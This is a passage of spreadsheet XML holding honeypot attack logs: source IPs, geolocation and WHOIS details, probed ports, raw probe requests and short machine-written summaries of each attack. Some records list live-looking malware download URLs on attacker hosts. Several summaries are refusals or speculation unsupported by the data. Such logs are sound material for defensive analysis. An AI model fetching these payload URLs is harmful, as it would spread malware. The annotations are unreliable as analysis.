    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>3389&amp;&amp;8443&amp;&amp;23&amp;&amp;443&amp;&amp;NA&amp;&amp;110</t>
  </si>
  <si>
    <t>BE</t>
  </si>
  <si>
    <t>Berlin</t>
  </si>
  <si>
    <t>Berlin (Bezirk Treptow-Köpenick)</t>
  </si>
  <si>
    <t>2950159</t>
  </si>
  <si>
    <t>12489</t>
  </si>
  <si>
    <t>52.4286</t>
  </si>
  <si>
    <t>13.531600000000001</t>
  </si>
  <si>
    <t>208843</t>
  </si>
  <si>
    <t>Alpha Strike Labs GmbH</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '103.211.202.140:8443', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA&amp;&amp;{Data_POP3:NA}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b0bc</t>
  </si>
  <si>
    <t>high&amp;&amp;medium&amp;&amp;low</t>
  </si>
  <si>
    <t>f89f4b13a40706bdf400d93e1a5736ce</t>
  </si>
  <si>
    <t>103.211.188.138</t>
  </si>
  <si>
    <t>Bulandshahr</t>
  </si>
  <si>
    <t>Shikārpūr</t>
  </si>
  <si>
    <t>1256532</t>
  </si>
  <si>
    <t>203395</t>
  </si>
  <si>
    <t>28.2798</t>
  </si>
  <si>
    <t>78.011</t>
  </si>
  <si>
    <t>135255</t>
  </si>
  <si>
    <t>Agrawal Technology Solutions</t>
  </si>
  <si>
    <t>::ffff:67d3:bc8a</t>
  </si>
  <si>
    <t>Possible malicious login attempt via telnet service, as data is missing or unavailable for telnet connections. No activity detected but potential security risk exists if left unmonitored. &amp;&amp; This log suggests a potential attempt to connect via TELNET, but was unable to be completed. The lack of successful connection may indicate an anomaly or blockage by security measures. No further activity was detected on this service. &amp;&amp; No TELNET activity detected, which may indicate that an attacker attempted to access or scan the system for vulnerabilities related to this service. The absence of TELNET traffic could be a sign of a reconnaissance attempt or probing for potential entry points. No meaningful data was exchanged through TELNET.</t>
  </si>
  <si>
    <t>159dbb706bd8ddcef0b2821317b74057</t>
  </si>
  <si>
    <t>185.247.137.231</t>
  </si>
  <si>
    <t>NA&amp;&amp;practical.monitoring.internet-measurement.com</t>
  </si>
  <si>
    <t>SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_IRC_H44&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_SIP_H44&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_SIP_H32&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_POSTGRES_H3&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_SOCKS5_H40</t>
  </si>
  <si>
    <t>110&amp;&amp;5432&amp;&amp;9100&amp;&amp;6379&amp;&amp;6667&amp;&amp;NA&amp;&amp;389&amp;&amp;21&amp;&amp;3306&amp;&amp;443&amp;&amp;143&amp;&amp;1080&amp;&amp;1521&amp;&amp;5900&amp;&amp;58835&amp;&amp;445&amp;&amp;25&amp;&amp;23</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;command&amp;&amp;request&amp;&amp;query&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.231,48275)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.231,58513)}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'bjhfiuio', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.231;tag=bjhfiuio', 'max-forwards': '0', 'to': 'sip:95.164.21.98', 'via': 'SIP/2.0/UDP 185.247.137.231:5060;branch=z9hG4bKbjhfiuio;received=185.247.137.231;rport=57901'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 122.170.7.108:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}</t>
  </si>
  <si>
    <t>::ffff:b9f7:89e7</t>
  </si>
  <si>
    <t>Possible malicious activity is attempted IMAP access without providing credentials or performing any legitimate action. This could be an attempt to scan for vulnerable services or exploit login vulnerabilities. The absence of expected behavior suggests a potential security threat. &amp;&amp; The system is being probed for Redis service, likely an attempt to exploit potential vulnerabilities or scan for sensitive data stored in memory. This could be a reconnaissance or scouting activity by malicious actors. It may also indicate a targeted attack on the system's database management capabilities.</t>
  </si>
  <si>
    <t>f338103d9c88522578cf0fa622d86c44</t>
  </si>
  <si>
    <t>182.76.208.221</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;7566&amp;&amp;53&amp;&amp;7065&amp;&amp;1433&amp;&amp;3306&amp;&amp;445</t>
  </si>
  <si>
    <t>Salem</t>
  </si>
  <si>
    <t>1257629</t>
  </si>
  <si>
    <t>636007</t>
  </si>
  <si>
    <t>11.6643</t>
  </si>
  <si>
    <t>78.146</t>
  </si>
  <si>
    <t>9498</t>
  </si>
  <si>
    <t>Bharti Airtel</t>
  </si>
  <si>
    <t>Bharti Airtel Ltd</t>
  </si>
  <si>
    <t>2010-02-17</t>
  </si>
  <si>
    <t>CHCK-3230153-Salem</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (182.76.208.221,62335)}&amp;&amp;{Data_SMB:Incoming connection (182.76.208.221,49393)}&amp;&amp;{Data_SMB:Incoming connection (182.76.208.221,50043)}</t>
  </si>
  <si>
    <t>::ffff:b64c:d0dd</t>
  </si>
  <si>
    <t>e8758318567bef31890c2f62d6e86e2b</t>
  </si>
  <si>
    <t>104.193.59.142</t>
  </si>
  <si>
    <t>ip-104-193-59-142.user.start.ca&amp;&amp;NA</t>
  </si>
  <si>
    <t>http://104.193.59.142:37653/bin.sh</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_NTP_H20&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;123&amp;&amp;389&amp;&amp;22&amp;&amp;5900&amp;&amp;9100&amp;&amp;80&amp;&amp;443&amp;&amp;1080&amp;&amp;445&amp;&amp;29419&amp;&amp;NA&amp;&amp;49630&amp;&amp;44750</t>
  </si>
  <si>
    <t>Canada</t>
  </si>
  <si>
    <t>ON</t>
  </si>
  <si>
    <t>Ontario</t>
  </si>
  <si>
    <t>Middlesex County</t>
  </si>
  <si>
    <t>London (Central London)</t>
  </si>
  <si>
    <t>6058560</t>
  </si>
  <si>
    <t>N6A</t>
  </si>
  <si>
    <t>42.9826</t>
  </si>
  <si>
    <t>-81.2495</t>
  </si>
  <si>
    <t>40788</t>
  </si>
  <si>
    <t>Start Communications</t>
  </si>
  <si>
    <t>2014-09-16</t>
  </si>
  <si>
    <t>START-CABLE-R4</t>
  </si>
  <si>
    <t>2014-12-17</t>
  </si>
  <si>
    <t>2000-10-31 16:55:37</t>
  </si>
  <si>
    <t>2029-12-29 05:00:00</t>
  </si>
  <si>
    <t>2024-01-02 16:29:55</t>
  </si>
  <si>
    <t>['ns1.start.ca', 'ns2.start.ca']</t>
  </si>
  <si>
    <t>MarkMonitor International Canada Ltd.</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']</t>
  </si>
  <si>
    <t>['abusecomplaints@markmonitor.com', 'domain.registration@telus.com', 'ccopsbilling@markmonitor.com']</t>
  </si>
  <si>
    <t>['+1.2083895740', '+1.6478370955']</t>
  </si>
  <si>
    <t>::ffff:68c1:3b8e</t>
  </si>
  <si>
    <t>59e9e49eec7af5ea068268fc7e69c925</t>
  </si>
  <si>
    <t>196.188.80.240</t>
  </si>
  <si>
    <t>http://196.188.80.240:50753/i</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>23&amp;&amp;45151&amp;&amp;NA&amp;&amp;45765&amp;&amp;51610&amp;&amp;51609</t>
  </si>
  <si>
    <t>2015-10-12</t>
  </si>
  <si>
    <t>::ffff:c4bc:50f0</t>
  </si>
  <si>
    <t>None&amp;&amp;C-I&amp;&amp;C-U</t>
  </si>
  <si>
    <t>No suspicious TELNET activity detected, as the status is marked as "Not Available". This suggests that either there was no attempt to connect or the connection was successfully dropped. No malicious action occurred. &amp;&amp; This log indicates that no malicious activity has been detected or recorded.</t>
  </si>
  <si>
    <t>I don't see any log data provided to analyze. Please provide the log data, and I'll be happy to assist you with naming the type of attack based on the information available.</t>
  </si>
  <si>
    <t>d804df5f05eb13b47f5856dd5f18a0df</t>
  </si>
  <si>
    <t>112.198.200.191</t>
  </si>
  <si>
    <t>http://112.198.200.191:60597/i</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>05</t>
  </si>
  <si>
    <t>Bicol Region</t>
  </si>
  <si>
    <t>Camarines Norte</t>
  </si>
  <si>
    <t>Malasugui</t>
  </si>
  <si>
    <t>1703005</t>
  </si>
  <si>
    <t>14.1439</t>
  </si>
  <si>
    <t>122.847</t>
  </si>
  <si>
    <t>Globe Telecom</t>
  </si>
  <si>
    <t>2009-02-12</t>
  </si>
  <si>
    <t>GBB-VISAYAS-IP-POOL</t>
  </si>
  <si>
    <t>::ffff:70c6:c8bf</t>
  </si>
  <si>
    <t>C-I&amp;&amp;C-U</t>
  </si>
  <si>
    <t>ad574b512d6b319ec243e5b9a4d1da2c</t>
  </si>
  <si>
    <t>37.148.13.85</t>
  </si>
  <si>
    <t>http://37.148.13.85:50843/.i</t>
  </si>
  <si>
    <t>Tehrān (District 3)</t>
  </si>
  <si>
    <t>6683528</t>
  </si>
  <si>
    <t>35.7838</t>
  </si>
  <si>
    <t>51.4361</t>
  </si>
  <si>
    <t>205647</t>
  </si>
  <si>
    <t>PARDIS FANVARI PARTAK LTD</t>
  </si>
  <si>
    <t>SHATEL</t>
  </si>
  <si>
    <t>SHTL-NET-DED</t>
  </si>
  <si>
    <t>2012-03-02</t>
  </si>
  <si>
    <t>::ffff:2594:d55</t>
  </si>
  <si>
    <t>fbec50ae25e77e6cb8dca84ae1994e56</t>
  </si>
  <si>
    <t>154.212.141.135</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_POSTGRES_H27&amp;&amp;SMA-LAB_PJL_H41&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_IMAP_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;23&amp;&amp;443&amp;&amp;80&amp;&amp;5432&amp;&amp;3306&amp;&amp;25&amp;&amp;445&amp;&amp;9100&amp;&amp;1433&amp;&amp;110&amp;&amp;143&amp;&amp;21&amp;&amp;56914</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;login&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.209.6:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMTP:{'arg': '/', 'command': 'GET', 'data': 'HTTP/1.1'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.113.33:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.42.176:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.135,40182)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (kUiZsemJ,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.135;rport=52290'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.63.23:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.135;rport=50489'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.135,45048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (hrjajVWJ,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.8.76:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '149.102.153.168:80', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d87</t>
  </si>
  <si>
    <t>The system is unable to establish a POP3 connection, possibly indicating an attempted brute-force login or port scanning activity from an external source. The lack of data suggests the connection was not successful. This may be a sign of reconnaissance by malicious actors. &amp;&amp; Attempted SQL injection or database query exploitation possibly via a POST request to a Postgres service. This could be a reconnaissance attempt or an attack in progress targeting a potentially vulnerable database. Possible malicious actor probing for exploitable vulnerabilities. &amp;&amp; Unknown host is making a GET request to retrieve version information, potentially trying to identify vulnerabilities in the service. This could be a reconnaissance or probing activity by an attacker. The '*' in the Accept header suggests no specific data type is expected. &amp;&amp; A GET request is being sent to retrieve version information, potentially for reconnaissance or exploitation purposes. This could be an initial step in a larger attack or vulnerability scan. It may indicate an attempt to gather information about the target system. &amp;&amp; A request was made to access the root directory of a web server with an unknown host, potentially indicating a scanning or reconnaissance activity. The '*' in 'Accept' suggests a non-specific request, possibly attempting to discover vulnerabilities. This could be the first step in a larger attack. &amp;&amp; An unknown client attempted a GET request to the root URI of a server, possibly for reconnaissance or exploitation purposes. This activity may indicate an attacker probing system vulnerabilities or gathering information about the server's configuration. The Accept header being set to '*' suggests no specific data format is requested, which could be indicative of a broad-scanning approach.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Port Scan &amp;&amp; HTTP Scan &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>a70f0d0c54103c93b3a53ab567b7f2d9</t>
  </si>
  <si>
    <t>125.229.5.154</t>
  </si>
  <si>
    <t>125-229-5-154.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;38686&amp;&amp;38701&amp;&amp;50545&amp;&amp;38657&amp;&amp;38721&amp;&amp;38744&amp;&amp;38763&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7de5:59a</t>
  </si>
  <si>
    <t>This log indicates an attempt to connect via telnet without specifying any target service, suggesting a scanning activity trying to identify available services.
The user or script seems to be probing for vulnerabilities by sending connection requests.
No malicious action was taken as no service is specified.</t>
  </si>
  <si>
    <t>550f5f84ba7bc7ea60fce6392ebcba84</t>
  </si>
  <si>
    <t>5.102.254.112</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Nefat Ramla</t>
  </si>
  <si>
    <t>Lod</t>
  </si>
  <si>
    <t>294421</t>
  </si>
  <si>
    <t>31.954</t>
  </si>
  <si>
    <t>34.8905</t>
  </si>
  <si>
    <t>47956</t>
  </si>
  <si>
    <t>XFone 018 Ltd</t>
  </si>
  <si>
    <t>Xfone Communication LTD</t>
  </si>
  <si>
    <t>::ffff:566:fe70</t>
  </si>
  <si>
    <t>0a91daff4d616e69a44f0ddcbc2c976d</t>
  </si>
  <si>
    <t>117.214.41.40</t>
  </si>
  <si>
    <t>::ffff:75d6:2928</t>
  </si>
  <si>
    <t>c0925eef8279c9497749d13a652263ad</t>
  </si>
  <si>
    <t>118.107.42.44</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;80&amp;&amp;NA&amp;&amp;445</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>HCW</t>
  </si>
  <si>
    <t>Central and Western</t>
  </si>
  <si>
    <t>Sheung Wan</t>
  </si>
  <si>
    <t>1818833</t>
  </si>
  <si>
    <t>22.2868</t>
  </si>
  <si>
    <t>114.152</t>
  </si>
  <si>
    <t>CTG Server Ltd.</t>
  </si>
  <si>
    <t>2007-09-06</t>
  </si>
  <si>
    <t>CTG107-40-HK</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,55976)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,56299)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,51383)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (118.107.42.44,51464)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:766b:2a2c</t>
  </si>
  <si>
    <t>dc784f6d610cb2094e60cc48eb5a1e55</t>
  </si>
  <si>
    <t>66.60.29.82</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>AR</t>
  </si>
  <si>
    <t>Argentina</t>
  </si>
  <si>
    <t>Buenos Aires</t>
  </si>
  <si>
    <t>Partido de General San Martín</t>
  </si>
  <si>
    <t>Ciudad del Libertador General San Martín</t>
  </si>
  <si>
    <t>3433779</t>
  </si>
  <si>
    <t>-34.5779</t>
  </si>
  <si>
    <t>-58.5386</t>
  </si>
  <si>
    <t>7303</t>
  </si>
  <si>
    <t>Telecom Argentina S.A.</t>
  </si>
  <si>
    <t>Telecom Argentina S.A</t>
  </si>
  <si>
    <t>Fibertel</t>
  </si>
  <si>
    <t>::ffff:423c:1d52</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze or describe any malicious activity. &amp;&amp; There is insufficient information to analyze potential malicious activity as there is no log data provided.</t>
  </si>
  <si>
    <t>I'll need some log data to analyze. Please provide it, and I'll give you the types of attacks with a short phrase for each one.</t>
  </si>
  <si>
    <t>cb7027e63415426a51ee7e7ebf1f5585</t>
  </si>
  <si>
    <t>77.247.146.32</t>
  </si>
  <si>
    <t>adsl-146-32.romerikebb.no</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Norway</t>
  </si>
  <si>
    <t>Akershus</t>
  </si>
  <si>
    <t>Aurskog-Høland</t>
  </si>
  <si>
    <t>Bjørkelangen</t>
  </si>
